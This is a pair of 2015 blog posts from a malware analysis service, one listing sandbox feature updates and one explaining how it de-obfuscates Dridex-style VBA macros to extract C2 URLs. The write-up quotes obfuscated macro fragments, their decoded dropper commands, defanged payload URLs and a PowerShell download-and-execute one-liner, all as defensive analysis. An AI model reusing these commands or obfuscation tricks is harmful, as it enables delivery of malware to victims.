Monday, March 23, 2015

Latest Updates of VxStream Sandbox and the Malware Analysis Service at Hybrid-Analysis.com

A previous blogpost published at the beginning of February outlined some of the new features that were added to our online malware service. We have added quite a lot of functionality since then and think it is a good idea to post a brief summary of what that is exactly to keep our readers and users up-to-date.

 

Updated Anti-VM Technology

After Pafish v0.4 (a benchmarking tool that implements common VM detection methods) was released earlier this year, we updated our anti-vm technology to be up-to-date and made a small benchmark of some popular malware analysis services at the same time. Today, Pafish v0.5 was released and we will start working on our anti-vm technology in the coming weeks and keep you updated on any progress.

 

Improved Searching Capabilities

We improved the webservice search and added some more advanced search options. On the previous version, you were able to search by filename, MD5 or SHA256 hash. Now, you can also search for a virus family name, all reports that contacted a specific host IP address or domain. Examples:
Please note: if only one result is returned by the search, you are automatically redirected to the report. Also, the vxfamily search is a substring search and applies only to the VxStream determined virus family name. All search results are limited to at most 100.

Also, some of the new searching capabilities were integrated into all online reports with direct links, so you can continue navigating to other reports by clicking the virus family name or quickly find other reports with common network destinations (see the following image).

 

Updated VBA Macro Parsing

As we had been getting more and more uploads of Word files and malicious XML files (and not all of them triggered or showed outgoing network traffic), we spent some time and added a small VBA "de-obfuscating" engine that helps extracting C2 IPs regardless of the runtime behavior. We made a blogpost about it last week that received good feedback and is showing some good results so far. After we published the blogpost, Philippe Lagadec announced that he is working on a generic engine that does the same and more - so we are looking forward to that development and will keep you updated on any progress.

 

Other updates not mentioned anywhere

Of course, we also make updates that are not published as part of blogposts or mentioned in the FAQ page of the service, because it would take too much time and not everything is really significant. Some of these updates over the past week included:
  • we added new YARA signatures that run on all input samples (we have ~600 online right now)
  • we have been adding more generic behavior signatures (we have ~215 online right now)
  • we added a webservice statistics page to clean up the front page, which tells you the current status of the number of signatures loaded by the system
  • we added support for MIME types (i.e. you can upload a MIME type and the service will "unmime" it and analyze a valid file, if it is embedded)
  • we added "environment groups" (multiple systems) that can be selected from if you upload a file
  • we added some Windows 8.1 VMs
  • we added the ability to "not share" a sample when submitting (it is not available for download and not uploaded to VirusTotal, if unknown)
  • we added a download for strings detected in-memory
  • we added shellcode streams that are extracted from memory written to foreign processes
  • we brushed up the visuals a bit, especially the submissions list that contains a lot more information now
.. and a few other minor things that should not be mentioned here.

Saturday, March 14, 2015

Analyzing obfuscated VBA macros to extract C2 IP/URLs regardless of runtime behavior

Introduction

Lately, we have been seeing quite a lot of Office documents (or XML files with embedded Office documents, etc.) that have embedded VBA macros on our malware analysis service, which try to drop Dridex or similar. Internally, we use olevba (thanks for this great tool to Philippe Lagadec, by the way!) to extract the VBA macro source code. Sometimes though, the Word file does not "trigger" (as it might include some VM detection code, requirement incompatibilities, etc.) so that in order to extract something useful like a C2 IP/URL nevertheless, we are left with static analysis techniques and an often heavily obfuscated macro source. Here's an example:
Function \xe2\xe0\xfb\xe2\xc0\xc0\xfb\xe2\xef\xfb\xe2\xe0(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean

\xcf\xd0\xfb\xe2\xe0\xc0 = 
\xce\xf0\xe2\xe0\xe0\xcc\xd0\xce\xeb\xe2\xef\xe2\xe0\xef(0&, 
z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)

Set \xe3\xed\xc3\xd8\xc0\xcf\xf8\xe2\xfb\xe0 = 
CreateObject(QSzFZhQCxywB(Chr$(83) & Chr$(132) & 
Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) 
& Chr$(108) & Chr$(89) & Chr$(108) & 
Chr$(131) & Chr$(46) & Chr$(133) & Chr$(65) 
& Chr$(52) & Chr$(112) & Chr$(97) & 
Chr$(112) & Chr$(61) & Chr$(108) & Chr$(117) 
& Chr$(105) & Chr$(47) & Chr$(99) & 
Chr$(110) & Chr$(97) & Chr$(122) & Chr$(116) 
& Chr$(59) & Chr$(105) & Chr$(75) & 
Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)))"
As we can see (even with VB syntax highlighting ;-) it is not very human friendly and applying a regex to pull an URL will not work either. In order to understand the VBA source better (and possibly apply some patterns), we would need to resolve e.g. the Chr$() calls, the ampersands, concatenate strings and so forth. As this is a pretty straightforward and "dumb" and "time consuming" manual process, we had an idea: why not do try to automate these kind of tasks - after all this is crying for a computer program to process. So we developed a small "simplifier" engine/algorithm that does some multi-passes through the various VBA functions to resolve and concatenate strings (and a little bit more). Additionally, we implemented some semi-intelligent brute-force mechanisms to extract URLs from the "simplified source code", as some of them are often padded with trash bytes or other simple algorithms.

Here is a "before/after" example to make this "simplification" a bit more understanding.

Before

URLLSK = "www.asivamosensalud.org/images/log"

STAA = "savepic.su/5238122"

STAB = "savepic.su/5233002"

...

Print #Kasdwq, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\W" + "indows\T" + "emp" + "\" + VBTXP + Chr(34)Print #Kasdwq, "pin" + "g 2.2.1.1 -n" & " 2" + ""

Print #Kasdwq, "" + "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + Chr(Asc("x")) + Chr(Asc("e"))

...

Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + URLLSK + "." + Chr(Asc("j")) + Chr(Asc("p")) + "g" + Chr(34)

Print #FileNumber, "statRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://" + STAA + "." + Chr(Asc("p")) + Chr(Asc("n")) + "g" + Chr(34)
    

After

Print #Kasdwq, "cscript.exe "c:\Windows\Temp\adobeacd-updatexp.vbs""

Print #Kasdwq, "ping 2.2.1.1 -n 2"

Print #Kasdwq, "c:\Windows\Temp\444.exe"

...

Print #FileNumber, "strRT = "http://www.asivamosensalud.org/images/log.jpg""

Print #FileNumber, "statRT = "http://savepic.su/5238122.png""

While the above example is a rather simple one, it still shows the basic principle and even includes a variable "constant propagation" kind of algorithm (see "URLLSK" and "STAA" in the "Before" code).

 

In Practice

Of course, we have been testing our new simplification algorithm and ran it against a few malicious Word documents, especially those that do not "trigger" (i.e. successfully start downloading files). The "non-triggering" samples are the most interesting, as those that execute successfully contain the alleged C2 URLs and IPs anyway. In the following, a few real-world examples with the corresponding malwr reports to underline that both systems did not trigger and/or show any network traffic.

 

Example 1

SHA256: 475aa057202c98a0eab161e1d073390b34312565f98efb6c527c01791805523b
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 2/57 (Sophos, TrendMicro) on 13/03/15, 19/57  on 14/03/15
Decoded URL: hxxp://95.163.121.186/api/gbb1.exe

 

Example 2

SHA256: 9683b0eed6bdb1f16607a9cac5c72af2a69839bb591d5f8bfd3efc3963b292c0
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 1/57 (Ikarus) on 13/03/15, 23/57 on 14/03/15
Decoded URL: hxxp://accalamh.aspone.cz/js/bin.exe

 

Example 3

SHA256: 8e6bb148ffc0e18c0450a89f7b0ba729a28eb22da12fd3f69d18daa85fd09024
Link: Hybrid-Analysis Report
Link: Malwr Report
VirusTotal: 1/57 (CAT-QuickHeal) on 16/02/15, 35/57 on 14/03/15
Decoded URL: hxxp://91.220.131.28/upd2/install.exe

When you take a look at the Hybrid-Analysis reports running with the new VBA processing capabilities, then you will see extracted C2 URLs/IPs as a "Found URL in decoded VBA string" signature in the malicious section at the top of the report. This is how it looks:


Of course, the presented simplification will not always yield the desired result, especially when malware authors adapt and introduce more complicated obfuscation techniques. As always, it is a bit of a cat and mouse game. Thus, we will be observing samples being submitted and try to adapt, if we can and if it's necessary. The current version works, but it is at the same time also a "proof of concept" to underline that there's a lot of room for improvement.

Conclusion

In our opinion we can make at least the following conclusions:
  • static analysis in the context of malware analysis can be very important, if we are a little bit more intelligent about it
  • from the small AV benchmark (see VirusTotal results above): we can say that about 1/3 of AV vendors seem to react quite quickly to new threats within 24 hours and/or day(s), while about 2/3 of AV vendors seem to react within the first couple of weeks, but a lot of vendors seem to have issues if it's a zero-day Word document, although it would be possible to detect malicious characteristics using pure static analysi
///

Update: small "add-on" to the decoding technique presented above. We have been getting some samples that try to hide URLs and other interesting strings using a simple hex-encoded ASCII string. Here is a good example:

https://www.hybrid-analysis.com/sample/83758075cd5d2538d77cb5b723fab1656455f0639f59d59898b23fb593bf3871

If we scroll down to the "Contains embedded VBA macros" and uncollapse the signature, then we can see the following VBA code:


The decoded String is actually:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://193.26.217.197/instana/vsacz.exe','%TEMP%\BKHkjgkKKJdf.cab'); expand %TEMP%\BKHkjgkKKJdf.cab %TEMP%\BKHkjgkKKJdf.exe; start %TEMP%\BKHkjgkKKJdf.exe;

Ouch! ;-)

We updated our algorithm to now also decode these kind of strings and forward them to the behavior signature interface (thereby triggering string related signatures and detecting the URL).

///

Contact us or learn more about VxStream Sandbox - Automated Malware Analysis.